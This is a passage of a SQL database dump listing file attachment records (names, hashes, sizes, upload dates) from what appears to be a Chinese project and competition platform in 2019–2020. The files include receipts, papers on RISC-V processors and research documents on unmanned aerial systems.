16:14:13',NULL,'2019/11',3,1,NULL,NULL,1,NULL,0,0,NULL),(892,54,'Task','支付凭证.rar','191105161654_92e4fffd94bc095656a735b4f092409e.rar',77,'','1d162de5c6034e307eb00ef52c18062d',0,50,'2019-11-05 16:16:54',NULL,'2019/11',4,1,NULL,NULL,1,NULL,0,0,NULL),(899,9,'Notice','数据标注大赛参赛手册.docx','191106085255_bdd4703887658013f66dd75e36be4379.docx',17565,'','322588266beb0a3d24af23d437e3aeb9',2,46,'2019-11-06 08:52:55',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(900,69,'Issue','账号.txt','191106163904_3a825eae981ee9a1fedfd524036e01c3.txt',373,NULL,'201a0fb6d4a7533d79c877d89cfea418',0,49,'2019-11-06 16:39:04','','2019/11',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(903,57,'Task','详细要求.rar','191106165511_70a6eee3f03fdf5a30c9821f34e43ae8.rar',289,'','b0c27fe797d7dcedaed17b49934a7160',0,49,'2019-11-06 16:55:11',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(904,89,'Paper','“人体运动状态信息评级”实例分析.pdf','191106170818_9046570b0cc9034be9bce338e480748c.pdf',608110,'','c19d5b1994289eaab280e41405971785',0,66,'2019-11-06 17:08:18',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(905,90,'Paper','算法代码文档数据.rar','191106170847_cbb8c4eb571c90f35d2d66b3a2324d96.rar',77,'','1d162de5c6034e307eb00ef52c18062d',0,65,'2019-11-06 17:08:47',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(906,91,'Paper','“车辆运动状态信息评级”实例编写与对比.pdf','191106170903_b8d1c1adff8c46453ee14964f690a4a4.pdf',843019,'','10ee6ace26ae587d86facee2b002dc4f',0,63,'2019-11-06 17:09:03',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(907,57,'Task','佐证材料.rar','191106171317_98958caeac8a8c41202731fe72899052.rar',77,'','1d162de5c6034e307eb00ef52c18062d',2,49,'2019-11-06 17:13:17',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1573031649,NULL),(908,57,'Task','支付凭证.png','191106171727_32225a86b864f82a2a60e3f13749486b.png',49226,'','7aec5d6a485848cb1abffa728ec4b135',0,46,'2019-11-06 17:17:27',NULL,'2019/11',3,1,NULL,NULL,1,NULL,0,0,NULL),(909,57,'Task','下载佐证材料.png','191106171820_dbb476e9482e3224a942130e32a73cee.png',57673,'','d7348b2ee26d4b855fc905c92408d842',0,46,'2019-11-06 17:18:20',NULL,'2019/11',4,1,NULL,NULL,1,NULL,0,0,NULL),(912,72,'Issue','账号.txt','191107111427_3a825eae981ee9a1fedfd524036e01c3.txt',373,NULL,'201a0fb6d4a7533d79c877d89cfea418',0,46,'2019-11-07 11:14:27','','2019/11',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(916,199,'Project','RISC-V架构的开源处理器及SoC研究综述.pdf','191107162723_6928426c77b11cfb82faf198375349c2.pdf',1095788,NULL,'a805bac5bf789647e477da6f725bdf88',0,49,'2019-11-07 16:27:23','','2019/11',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(918,NULL,NULL,'“人体运动状态信息评级”实例分析.pdf','191107164639_9046570b0cc9034be9bce338e480748c.pdf',608110,'','c19d5b1994289eaab280e41405971785',0,65,'2019-11-07 16:46:39',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(919,NULL,NULL,'图片.rar','191107164723_43863cc8b6e085f0082992f92c2284b7.rar',1068678,'','7563b1db35808a096e192f7570b8dc3f',0,63,'2019-11-07 16:47:23',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(920,60,'Task','佐证材料.png','191107165100_6d566ffd6f6ef5abc8d829b65d9b8f24.png',74730,'','7d70c37e10cb8f761f4b993c4c07b3a7',1,49,'2019-11-07 16:51:00',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1573116789,NULL),(922,60,'Task','木兰宽松许可证.docx','191107165531_252f2d4a3c5bd9e89c20523f945a1f47.docx',16867,'','fa27d217a44523c674dd4ab55896da68',0,46,'2019-11-07 16:55:31',NULL,'2019/11',3,1,NULL,NULL,1,NULL,0,0,NULL),(923,60,'Task','发票.pdf','191107165603_e2b70aecd0ac58b79cb5bed0a743d660.pdf',127318,'','ae5853c69bdea4c81c36d898f8bb4327',0,46,'2019-11-07 16:56:03',NULL,'2019/11',4,1,NULL,NULL,1,NULL,0,0,NULL),(930,14,'Competition','e6f07ba1a2fcfac6bc2c4a0364842fd6.jpg','191108084424_e6f07ba1a2fcfac6bc2c4a0364842fd6.jpg',454452,'','5f8eb5467c3553054c8e627c8d371436',4,50,'2019-11-08 08:44:24',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(931,14,'Competition','584d9402d7bc0354e3135c1e619b2aba.jpg','191108084424_584d9402d7bc0354e3135c1e619b2aba.jpg',277509,'','0ac6f559df77d2337dcecfebf7064c0c',5,50,'2019-11-08 08:44:24',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(932,14,'Competition','cc08ddc8e78bd077f154b47de4370f20.jpg','191108084424_cc08ddc8e78bd077f154b47de4370f20.jpg',114669,'','2202a9dacc8b430a27118bb2d38cdaa8',5,50,'2019-11-08 08:44:24',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(933,14,'Competition','582c1206fe8052ebf3052dded90695ca.jpg','191108084424_582c1206fe8052ebf3052dded90695ca.jpg',659187,'','faf0097946384360d00f507b3b36cd78',4,50,'2019-11-08 08:44:24',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(934,14,'Competition','61d56966ce914cb3e315df4aaf806f9f.jpg','191108084424_61d56966ce914cb3e315df4aaf806f9f.jpg',392758,'','9590d5cbabc71c1874fa719668c54875',4,50,'2019-11-08 08:44:24',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(935,11,'Competition','69476e30c792c4f96c0cf952a3956315.jpg','191108085132_69476e30c792c4f96c0cf952a3956315.jpg',151426,'','086be09cecf09445699beda6ab94c4d6',8,50,'2019-11-08 08:51:32',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(936,11,'Competition','80f7b33f53bf6e2e848db6f49ae19830.jpg','191108085132_80f7b33f53bf6e2e848db6f49ae19830.jpg',943199,'','d1dafaf9aca74b676cbcb30b44ff1ae4',6,50,'2019-11-08 08:51:32',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(937,76,'Issue','issues_蓝屏.png','191108111034_290a363cafe134ea8ccedf4084ed3d67.png',26502,NULL,'221240a36003be353da669b235237af2',0,63,'2019-11-08 11:10:34','','2019/11',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(938,61,'Task','详细要求.rar','191108145624_70a6eee3f03fdf5a30c9821f34e43ae8.rar',289,'','b0c27fe797d7dcedaed17b49934a7160',4,49,'2019-11-08 14:56:24',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(940,65,'Task','详细要求.rar','191108145937_70a6eee3f03fdf5a30c9821f34e43ae8.rar',289,'','b0c27fe797d7dcedaed17b49934a7160',0,49,'2019-11-08 14:59:37',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(941,105,'Paper','C.label','191110134513_C.label',579630,'','bcfb5a8bde3a3f27363788a7ec3d8519',0,63,'2019-11-10 13:45:13',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(943,107,'Paper','A.label','191110134637_A.label',843049,'','5ee9c7af400008a9f2d15949582b1202',0,63,'2019-11-10 13:46:37',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(944,61,'Task','评审意见.docx','191110134853_4bbe5941de8fe487709b093d47fce390.docx',13260,'','fc37a2e10764c8a392a917f2469ed991',0,49,'2019-11-10 13:48:53',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1573365050,NULL),(945,61,'Task','评审意见.png','191110134854_cecf6fc86eb131336dc8744165ac06f8.png',74730,'','7d70c37e10cb8f761f4b993c4c07b3a7',1,49,'2019-11-10 13:48:54',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1573365050,NULL),(946,62,'Task','评审意见.docx','191110134951_4bbe5941de8fe487709b093d47fce390.docx',13260,'','fc37a2e10764c8a392a917f2469ed991',0,49,'2019-11-10 13:49:51',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1573365046,NULL),(947,62,'Task','评审意见.png','191110134951_cecf6fc86eb131336dc8744165ac06f8.png',74730,'','7d70c37e10cb8f761f4b993c4c07b3a7',1,49,'2019-11-10 13:49:51',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1573365046,NULL),(950,11,'Notice','数据标注大赛参赛手册.docx','191110140011_bdd4703887658013f66dd75e36be4379.docx',17565,'','322588266beb0a3d24af23d437e3aeb9',3,50,'2019-11-10 14:00:11',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(952,199,'Project','五级流水线RISC-V处理器软硬件协同仿真验证.pdf','191111100039_ed9b31ce2c021a910981f49b177cac03.pdf',309980,NULL,'14a22a2f289bcf9bbb1b21be80efaa3d',0,49,'2019-11-11 10:00:39','','2019/11',NULL,1,NULL,NULL,1,NULL,0,0,NULL),(955,NULL,NULL,'项目创建者操作和需求方.docx','191111171343_bc7eaf0abf5e4c5ad67a0afda7d2da44.docx',19791,'','a638385d6e8860f7662d4ac6b68e2bb3',0,49,'2019-11-11 17:13:43',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(956,199,'Project','项目创建者操作和需求方.docx','191111171641_bc7eaf0abf5e4c5ad67a0afda7d2da44.docx',19791,NULL,'a638385d6e8860f7662d4ac6b68e2bb3',2,49,'2019-11-11 17:16:41','','2019/11',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(960,61,'Task','签订协议凭证.docx','191111172541_98a5a0bf0693bba8a972a6de1e5e4419.docx',16867,'','fa27d217a44523c674dd4ab55896da68',0,50,'2019-11-11 17:25:41',NULL,'2019/11',3,1,NULL,NULL,1,NULL,0,0,NULL),(961,61,'Task','支付报酬凭证.pdf','191111172611_c09a461e0cecbaedbb7040a4d71121e4.pdf',127318,'','ae5853c69bdea4c81c36d898f8bb4327',0,50,'2019-11-11 17:26:11',NULL,'2019/11',4,1,NULL,NULL,1,NULL,0,0,NULL),(966,69,'Task','机器学习.docx','191113085405_ff9d1a87e71e7799413219cf59a03e53.docx',107321,'','8adef95779420434f024432690a2622f',0,49,'2019-11-13 08:54:05',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1573606484,NULL),(967,90,'Review','机器学习.docx','191113090825_ff9d1a87e71e7799413219cf59a03e53.docx',107321,'','8adef95779420434f024432690a2622f',0,49,'2019-11-13 09:08:25',NULL,'2019/11',3,1,NULL,NULL,1,NULL,0,0,NULL),(969,91,'Review','机器学习.docx','191113091525_ff9d1a87e71e7799413219cf59a03e53.docx',107321,'','8adef95779420434f024432690a2622f',0,49,'2019-11-13 09:15:25',NULL,'2019/11',4,1,NULL,NULL,1,NULL,0,0,NULL),(979,76,'Task','新建文本文档.txt','191121150424_48a3823e1ee72a1a06a62cbdcb4a5cd0.txt',296,'','e951099c8f7a38d35dcca90bd5c0b0a9',0,49,'2019-11-21 15:04:24',NULL,'2019/11',2,1,NULL,NULL,1,NULL,0,1574319865,NULL),(983,2,'TaskTemplate','发票.pdf','191122161105_e2b70aecd0ac58b79cb5bed0a743d660.pdf',127318,'','ae5853c69bdea4c81c36d898f8bb4327',0,50,'2019-11-22 16:11:05',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(984,NULL,NULL,'timg (4).jpeg','191125160456_a11ec41da72f1f970a953b232c81e515.jpeg',18305,'','a79f80979340f4cf126cde1eff62e088',0,50,'2019-11-25 16:04:56',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(985,NULL,NULL,'timg (5).jpeg','191125160704_ea1de17328b2a80eb5dceb9f177897a9.jpeg',887525,'','8eac8f9edc564e87a06d67ee4c576aeb',0,50,'2019-11-25 16:07:04',NULL,'2019/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(986,127,'Paper','账户管理.png','191230100716_0ab7f5c1cddec7d9e3a0d97b9a7fcd8f.png',48160,'','baae20579f89a9ce0a5162b8127e53fd',0,64,'2019-12-30 10:07:16',NULL,'2019/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(987,128,'Paper','北京市导航图.PNG','191230101619_5d0f1915a966b5c7cff8ec9a8851bc20.PNG',1552009,'','b955cbdc5e3db377d79f723888f85b56',1,64,'2019-12-30 10:16:19',NULL,'2019/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(989,129,'Paper','介绍.txt','191230150147_63179350501db898257d82fc88828c0f.txt',404,'','45127469d94e1b272eb016147db572b1',1,66,'2019-12-30 15:01:47',NULL,'2019/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(991,131,'Paper','系统管理.png','191230153759_edc2ffdbb22b57ca5c513fbe17393175.png',71536,'','cfcc7cf2981d3902d13095695763b73f',0,46,'2019-12-30 15:37:59',NULL,'2019/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(992,132,'Paper','软件结构图.jpg','191230153935_abc6bb97dc0e6642f4799e57a036e724.jpg',40087,'','700b84ad25610fd8fa84afc96526ba13',0,64,'2019-12-30 15:39:35',NULL,'2019/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(993,92,'Task','图片.rar','191230154056_43863cc8b6e085f0082992f92c2284b7.rar',1068678,'','7563b1db35808a096e192f7570b8dc3f',0,49,'2019-12-30 15:40:56',NULL,'2019/12',2,1,NULL,NULL,1,NULL,0,1577691669,NULL),(994,251,'Project','InstallLog.log','200201193138_InstallLog.log',196,NULL,'5aea42c8c913d7bb90aafabc3d78ba48',1,75,'2020-02-01 19:31:38','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(995,101,'Project','如何编辑和删除项目中的问题20150929.docx','200203180632_c6b20821f5784416b27e3e9e476865d8.docx',146661,NULL,'f544e1bfcbb884cf0e27354302d2efad',0,1,'2020-02-03 18:06:32','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(996,255,'IssueImage','e27ebdfcd56e0938f2915cf66e581caf','200211094906_e27ebdfcd56e0938f2915cf66e581caf',997,'image/png','7f45c43cbd993df39938e7674a1453eb',1,81,'2020-02-11 09:49:06',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(997,112,'Issue','算法列表.xlsx','200211095352_74213be451a586aa51d44a843c3525af.xlsx',13356,NULL,'e32c23bcf8cecd217b2fa3075d18503b',1,81,'2020-02-11 09:53:52','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(998,255,'IssueImage','995b632d1eb478622008e40d7cf65165','200211095529_995b632d1eb478622008e40d7cf65165',957,'image/png','733195b584228a9496eaed923b30909b',1,81,'2020-02-11 09:55:29',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(999,113,'Issue','算法列表.xlsx','200211095620_74213be451a586aa51d44a843c3525af.xlsx',13354,NULL,'5599105c2f70df2f075840daedc11e91',0,81,'2020-02-11 09:56:20','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1000,255,'IssueImage','138572f0e245fd54451bd90a685c272a','200211100442_138572f0e245fd54451bd90a685c272a',931,'image/png','c2fd8ca2d7057d050b95c6ae9b7a360a',1,81,'2020-02-11 10:04:42',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1001,114,'Issue','算法列表.xlsx','200211100509_74213be451a586aa51d44a843c3525af.xlsx',13354,NULL,'5599105c2f70df2f075840daedc11e91',1,81,'2020-02-11 10:05:09','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1002,255,'IssueImage','7e5f0252a26c677f0fe5182029928c0a','200211100620_7e5f0252a26c677f0fe5182029928c0a',945,'image/png','afc7d3f75d6405851db9d2b4759c1f95',1,81,'2020-02-11 10:06:20',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1003,115,'Issue','算法列表.xlsx','200211100658_74213be451a586aa51d44a843c3525af.xlsx',13354,NULL,'5599105c2f70df2f075840daedc11e91',2,81,'2020-02-11 10:06:58','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1004,255,'IssueImage','06c3c6c986712354e0c33150fa6de896','200211100756_06c3c6c986712354e0c33150fa6de896',956,'image/png','d7940f3ed38d3eb868577c4ab0ec6641',1,81,'2020-02-11 10:07:56',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1005,116,'Issue','算法列表.xlsx','200211100900_74213be451a586aa51d44a843c3525af.xlsx',13354,NULL,'5599105c2f70df2f075840daedc11e91',0,81,'2020-02-11 10:09:00','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1006,255,'IssueImage','0ef2661ff16cc92ee8b0c0b1678307d3','200211101049_0ef2661ff16cc92ee8b0c0b1678307d3',1536,'image/png','b91cc8c10c709341c5fbb0cbc92bb355',1,81,'2020-02-11 10:10:49',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1007,117,'Issue','算法列表.xlsx','200211101113_74213be451a586aa51d44a843c3525af.xlsx',13354,NULL,'5599105c2f70df2f075840daedc11e91',0,81,'2020-02-11 10:11:13','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1008,255,'IssueImage','03dd3c4f392ed383c5dffbdb831896bf','200211101157_03dd3c4f392ed383c5dffbdb831896bf',962,'image/png','0dd6dd4f7e12d6745e1c04e053945a9d',1,81,'2020-02-11 10:11:57',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1009,255,'IssueImage','54c1ddcf8d0f0b75955b2fec939e6e98','200211101248_54c1ddcf8d0f0b75955b2fec939e6e98',1433,'image/png','71f059c6f2969a628411d54d66efb647',1,81,'2020-02-11 10:12:48',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1010,119,'Issue','算法列表.xlsx','200211101351_74213be451a586aa51d44a843c3525af.xlsx',13354,NULL,'5599105c2f70df2f075840daedc11e91',0,81,'2020-02-11 10:13:51','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1011,255,'IssueImage','93a948addd13152f91a91c648e72c4ab','200211101434_93a948addd13152f91a91c648e72c4ab',1033,'image/png','07d42fdc0d0785ea61269d52116d63cf',1,81,'2020-02-11 10:14:34',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1012,120,'Issue','算法列表.xlsx','200211101506_74213be451a586aa51d44a843c3525af.xlsx',13354,NULL,'5599105c2f70df2f075840daedc11e91',0,81,'2020-02-11 10:15:06','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1013,121,'Issue','20200206-算法能力拆解.pdf','200211101826_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:18:26','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1014,122,'Issue','20200206-算法能力拆解.pdf','200211101956_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:19:56','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1015,124,'Issue','20200206-算法能力拆解.pdf','200211102159_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:21:59','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1016,125,'Issue','20200206-算法能力拆解.pdf','200211102233_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:22:33','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1017,126,'Issue','20200206-算法能力拆解.pdf','200211102316_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',1,81,'2020-02-11 10:23:16','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1018,127,'Issue','20200206-算法能力拆解.pdf','200211102353_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:23:53','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1019,128,'Issue','20200206-算法能力拆解.pdf','200211102437_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:24:37','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1020,129,'Issue','20200206-算法能力拆解.pdf','200211102517_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',3,81,'2020-02-11 10:25:17','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1021,130,'Issue','20200206-算法能力拆解.pdf','200211102608_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:26:08','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1022,131,'Issue','20200206-算法能力拆解.pdf','200211102704_09a86eb0a22179809929b60e7a57952c.pdf',650034,NULL,'d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:27:04','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1023,NULL,NULL,'20200206-算法能力拆解.pdf','200211102859_09a86eb0a22179809929b60e7a57952c.pdf',650034,'','d75a1510885a0930d65a2875ac2c456b',0,81,'2020-02-11 10:28:59',NULL,'2020/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1024,255,'Project','Ahern.pdf','200211103035_Ahern.pdf',443472,NULL,'dbe4431afaba4e29d02dedc18942994d',1,81,'2020-02-11 10:35:34','美军历年无人机路线图','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1025,255,'Project','Army Unmanned Systems Roadmap 2018.pdf','200211103035_d83d3c2883e8cdb7a001f69ec812293b.pdf',1085792,NULL,'afaab45a5e7a4fa7e4614aa328565dc7',1,81,'2020-02-11 10:35:42','美军历年无人机路线图','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1026,255,'Project','DoD FY19 Budget Report_FINAL DRAFT_WITH SENATE NDAA.pdf','200211103036_1f766ab8cf9870e83b27c73c0cebeb99.pdf',2364065,NULL,'8ff8faec655a471946329644c72bcb1e',1,81,'2020-02-11 10:35:10','美军历年无人机路线图','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1027,255,'Project','Second_Edition_Integration_of_Civil_UAS_NAS_Roadmap_July 2018.pdf','200211103036_16652264adb9400727f0b545198a6884.pdf',2205238,NULL,'cd59b9eef7eca48f66ae61bd6e4170cf',1,81,'2020-02-11 10:35:16','美军历年无人机路线图','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1028,255,'Project','U_0604400D8Z_4_PB_2017.pdf','200211103036_U_0604400D8Z_4_PB_2017.pdf',315722,NULL,'d3e609c3fff357a9bd6732cd0a076340',2,81,'2020-02-11 10:35:22','美军历年无人机路线图','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1029,255,'Project','Unmanned Systems Integrated Roadmap FY2011-2036 .pdf','200211103037_2581659f4f7add4cd646a5e5aeeadbb3.pdf',5463948,NULL,'b514fc6c9cf2c96759ae4cb60285292b',1,81,'2020-02-11 10:35:01','美军历年无人机路线图','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1030,255,'Project','Unmanned Systems Integrated Roadmap FY2013-2038 .pdf','200211103039_09b9717c2830c9310f3695a68884c642.pdf',4636225,NULL,'cad78957a068049ee6cd321a7ed6dd1d',1,81,'2020-02-11 10:34:54','美军历年无人机路线图','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1031,255,'Project','Unmanned Systems Integrated Roadmap FY2017-2042 .pdf','200211103039_ac4918302164c7fbb3961fba689840cd.pdf',2495207,NULL,'d4ec9eec315240a487de92afe7c5fd51',1,81,'2020-02-11 10:34:47','美军历年无人机路线图','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1032,255,'Project','10D_SSRR-2016_iTAP-AFITNPS_Madachy-v3.pdf','200211103306_10D_SSRR-2016_iTAP-AFITNPS_Madachy-v3.pdf',1617743,NULL,'f0a32d060500504ed9339046fdafb442',1,81,'2020-02-11 10:34:40','综述性论文、中国无人机调查','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1033,255,'Project','1912.06285.pdf','200211103307_1912.06285.pdf',5659036,NULL,'313d40666ece192a254c414b484276db',1,81,'2020-02-11 10:34:33','综述性论文、中国无人机调查','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1034,255,'Project','2016-Live fly large scale field experimentation.pdf','200211103308_285fc9f986703c2008d2b2673489f563.pdf',6317996,NULL,'1a31e060dd8151a89dde8e9b9c02fd29',1,81,'2020-02-11 10:34:26','综述性论文、中国无人机调查','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1035,255,'Project','5191ed49042d2c1ffa5ad9f60015a539.pdf','200211103309_5191ed49042d2c1ffa5ad9f60015a539.pdf',2327186,NULL,'1e7f3af315aca53c91ac4f0afc63e50e',1,81,'2020-02-11 10:34:12','综述性论文、中国无人机调查','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1036,255,'Project','China_s Military UAV Industry_14 June 2013.pdf','200211103309_26ec645378f7770570d1fa9fa2390e34.pdf',1652107,NULL,'12533dc30ca639998a40a6d2c3278f37',1,81,'2020-02-11 10:34:19','综述性论文、中国无人机调查','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1037,255,'Project','Unmanned Aerial Vehicles A Survey on Civil Applications and Key Research Challenges.pdf','200211103310_92157d45d61fea11c7ef77ecb67f58ff.pdf',5510693,NULL,'7fd93ea71a2bd3913d27c085c4123422',2,81,'2020-02-11 10:34:05','综述性论文、中国无人机调查','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1038,255,'Project','Unmanned Aircraft Systems in the Cyber Domain.pdf','200211103317_ebd7270bc28963dd9dac353dbb92977d.pdf',31849559,NULL,'400d924c6bea57063c1bd1ae353637d7',4,81,'2020-02-11 10:33:59','综述性论文、中国无人机调查','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1039,255,'Project','信息域报告汇总-20200211.rar','200211191721_9fe6a15d80124c5ba8b217cb8b8197e3.rar',16199018,NULL,'7f1f75d5d99dc7be7d09070dfe61e42d',3,83,'2020-02-11 19:17:21','信息域场景、实时方面的报告,截止2020年2月11日','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1040,255,'Project','英文版-蜂群武器系统-并行攻击的蜂群智能算法演示.pdf','200211215130_eff0fbc38b42328233682e08bcddb722.pdf',2346186,NULL,'9b4684a03fed777657143467466a21b8',0,81,'2020-02-11 21:51:59','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1041,255,'Project','英文版-中国在人工智能领域的军事创新.pdf','200211215131_4cfd9fe2af8addaa604659f7ab166e8e.pdf',1924030,NULL,'7af2d57f1c1c5a05aef2f117c6879c8e',0,81,'2020-02-11 21:51:52','','2020/02',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1042,20,'Competition','1f75a1e4e88d7bce5158005abafe2bd2.jpg','200318155259_1f75a1e4e88d7bce5158005abafe2bd2.jpg',438823,'','b035e565a91d11bd36afd857e4822515',8,46,'2020-03-18 15:52:59',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1043,22,'Competition','a015617aa067539597f2916acd1ed009.jpg','200318163835_a015617aa067539597f2916acd1ed009.jpg',438823,'','b035e565a91d11bd36afd857e4822515',4,46,'2020-03-18 16:38:35',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1044,16,'Notice','0318.txt','200318164815_0318.txt',247,'','5d088f4a5a4f3d8e83cb12bff5fd3d91',0,1,'2020-03-18 16:48:15',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1045,18,'Notice','0318.txt','200319085602_0318.txt',247,'','5d088f4a5a4f3d8e83cb12bff5fd3d91',0,1,'2020-03-19 08:56:02',NULL,'2020/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1046,255,'Project','20191022DDS与通信板的注意事项.pdf','200319140725_d3377121f2688f20fa554697d4be1448.pdf',160745,NULL,'b3d34389154ce4a317800e7675e63a57',1,76,'2020-03-19 14:07:25','','2020/03',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1047,255,'Project','DDS建议.pdf','200319140733_2596f5ef727ebdf93d427f9f27961b27.pdf',302433,NULL,'30ebc301ad7e7817c3d492304be4b426',1,76,'2020-03-19 14:07:33','','2020/03',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1048,255,'Project','Gazebo-exercise安装指导(1).pdf','200319140737_512464b433b6fc481e85c844b67b29d4.pdf',287463,NULL,'29b0d42834e678f6f367607fadecc55d',1,76,'2020-03-19 14:07:37','','2020/03',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(1051,255,'Project','micROS仿真测试平台-新.pdf','200319140751_c554b575563979c5170c99a7670121e2.pdf',144094,NULL,'04fdfc8e32771f60e541f746ead20b27',1,76,'2020-03-19 